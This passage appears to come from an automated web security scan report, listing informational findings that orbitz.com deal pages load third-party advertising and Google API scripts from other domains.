http://www.revresda.com/js.ng/channel=SingleDest&Section=main&adsize=120x55_footer&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=hoteldeals_package&adsize=300x600_bottom&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/js.ng/channel=deals&Section=hoteldeals_package&adsize=300x600_top&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/js.ng/channel=deals&Section=hoteldeals_package&adsize=336x280&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/js.ng/channel=deals&Section=hoteldeals_package&adsize=sponsorlogo&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_left&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_right&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=323x89&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&height=90&width=728&adType=noframe&

Request

Response

18.806. http://www.orbitz.com/App/PerformMDLPDealsContent previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PerformMDLPDealsContent

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/jsapi
http://www.revresda.com/html.ng/channel=deals&Section=main&adsize=featuredest&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=script&pos=middle&
http://www.revresda.com/js.ng/Params.richmedia=yes&Section=main&adsize=1x1&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/js.ng/channel=SingleDest&Section=main&adsize=120x55_footer&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_left&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_right&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=300x600_bottom&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=300x600_top&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=323x89&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=336x280&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=sponsorlogo&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&

Request

Response

18.807. http://www.orbitz.com/App/PerformMDLPDealsContent previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PerformMDLPDealsContent

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/jsapi
http://www.revresda.com/html.ng/channel=deals&Section=hoteldeals_package&adsize=featuredest&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=script&pos=middle&
http://www.revresda.com/js.ng/Params.richmedia=yes&Section=hoteldeals_package&adsize=1x1&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/js.ng/channel=SingleDest&Section=main&adsize=120x55_footer&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=hoteldeals_package&adsize=300x600_bottom&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/js.ng/channel=deals&Section=hoteldeals_package&adsize=300x600_top&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/js.ng/channel=deals&Section=hoteldeals_package&adsize=336x280&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/js.ng/channel=deals&Section=hoteldeals_package&adsize=sponsorlogo&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_left&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_right&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=323x89&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&height=90&width=728&adType=noframe&

Request

Response

18.808. http://www.orbitz.com/App/PerformMDLPDealsContent previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PerformMDLPDealsContent

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/jsapi
http://www.google.com/jsapi?key=ABQIAAAA6K7-G9TwmbSAW0WMeI7twRRuLtrLBmy3ZCyUfu5dRv1kHZq3GhQwwTCDcXv2m_f6QE7H9Tmg0QAwAA
http://www.revresda.com/html.ng/channel=deals&Section=promo_activities&adsize=featuredest&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=script&pos=middle&
http://www.revresda.com/js.ng/Params.richmedia=yes&Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/js.ng/channel=SingleDest&Section=main&adsize=120x55_footer&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_left&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_right&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=323x89&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=300x600_bottom&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=300x600_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=336x280&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&

Request

Response

18.809. http://www.orbitz.com/App/PerformMDLPDealsContent previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PerformMDLPDealsContent

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/jsapi
http://www.google.com/jsapi?key=ABQIAAAA6K7-G9TwmbSAW0WMeI7twRRuLtrLBmy3ZCyUfu5dRv1kHZq3GhQwwTCDcXv2m_f6QE7H9Tmg0QAwAA
http://www.revresda.com/html.ng/channel=deals&Section=promo_activities&adsize=featuredest&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=script&pos=middle&
http://www.revresda.com/js.ng/Params.richmedia=yes&Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/js.ng/channel=SingleDest&Section=main&adsize=120x55_footer&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_left&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_right&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=323x89&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=300x600_bottom&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=300x600_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=336x280&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&

Request

Response

18.810. http://www.orbitz.com/App/PerformMDLPDealsContent previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PerformMDLPDealsContent

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/jsapi
http://www.revresda.com/html.ng/channel=deals&Section=hoteldeals_package&adsize=featuredest&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=script&pos=middle&
http://www.revresda.com/js.ng/Params.richmedia=yes&Section=hoteldeals_package&adsize=1x1&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/js.ng/channel=SingleDest&Section=main&adsize=120x55_footer&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=hoteldeals_package&adsize=300x600_bottom&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/js.ng/channel=deals&Section=hoteldeals_package&adsize=300x600_top&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/js.ng/channel=deals&Section=hoteldeals_package&adsize=336x280&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/js.ng/channel=deals&Section=hoteldeals_package&adsize=sponsorlogo&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_left&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_right&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=323x89&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&height=90&width=728&adType=noframe&

Request

Response

18.811. http://www.orbitz.com/App/PerformMDLPDealsContent previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PerformMDLPDealsContent

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/jsapi
http://www.google.com/jsapi?key=ABQIAAAA6K7-G9TwmbSAW0WMeI7twRRuLtrLBmy3ZCyUfu5dRv1kHZq3GhQwwTCDcXv2m_f6QE7H9Tmg0QAwAA
http://www.revresda.com/html.ng/channel=deals&Section=promo_activities&adsize=featuredest&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=script&pos=middle&
http://www.revresda.com/js.ng/Params.richmedia=yes&Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/js.ng/channel=SingleDest&Section=main&adsize=120x55_footer&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_left&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_right&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=323x89&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=300x600_bottom&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=300x600_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=336x280&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=noframe&

Request

Response

18.812. http://www.orbitz.com/App/PerformMDLPDealsContent previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PerformMDLPDealsContent

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/jsapi
http://www.revresda.com/html.ng/channel=deals&Section=main&adsize=featuredest&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=script&pos=middle&
http://www.revresda.com/js.ng/Params.richmedia=yes&Section=main&adsize=1x1&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/js.ng/channel=SingleDest&Section=main&adsize=120x55_footer&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_left&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_right&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=300x600_bottom&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=300x600_top&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=323x89&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=336x280&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=sponsorlogo&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&

Request

Response

18.813. http://www.orbitz.com/App/PerformMDLPDealsContent previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PerformMDLPDealsContent

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/jsapi
http://www.google.com/jsapi?key=ABQIAAAA6K7-G9TwmbSAW0WMeI7twRRuLtrLBmy3ZCyUfu5dRv1kHZq3GhQwwTCDcXv2m_f6QE7H9Tmg0QAwAA
